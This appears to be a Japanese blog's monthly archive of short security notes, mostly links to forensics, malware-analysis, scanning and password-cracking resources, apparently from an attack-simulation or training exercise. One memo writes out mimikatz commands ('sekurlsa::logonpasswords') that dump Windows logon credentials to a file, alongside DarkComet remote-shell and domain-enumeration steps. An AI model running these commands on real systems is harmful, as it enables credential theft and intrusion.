2017-10-01から1ヶ月間の記事一覧

mimikatz

https://docs.microsoft.com/ja-jp/enterprise-mobility-security/solutions/ata-attack-simulation-playbook

ちょっとメモ

Defaultgateway Darkcomet RemoteShell ipconfig→192.168.0.XXXADSVのAdminPasswd mimikatzを/にsend privilege::debug sekurlsa::logonpasswords exit >> ~tmp/victim.txt csvde.exe -ur -f -b administrator datafusioncenter.local リモートマシンで起動…

IP GeoLocate

https://www.aguse.jp/http://www.iphiroba.jp/ip.php

log2timeline 使い方

https://digital-forensics.sans.org/blog/2011/12/07/digital-forensic-sifting-super-timeline-analysis-and-creation

zeus 参考

http://dev.classmethod.jp/study_meeting/volatility-framework/

不審なプロセスの発見

https://digital-forensics.sans.org/media/poster_2014_find_evil.pdf

OpenVAS 設定

http://blog.amedama.jp/entry/2017/08/09/004706

Free Password Hash Cracker

https://crackstation.net/

Windows Security Log Event

https://www.ultimatewindowssecurity.com/

Ollydbg Sample

http://kira000.hatenadiary.jp/entry/2014/04/12/022801

Windows Sysinternals

https://technet.microsoft.com/ja-jp/sysinternals/bb842062

NoMoreRansom

https://www.nomoreransom.org/crypto-sheriff.php?lang=ja

SQLインジェクションの例

http://npnl.hatenablog.jp/entry/20080412/1207965105

nir soft

http://www.nirsoft.net/utils/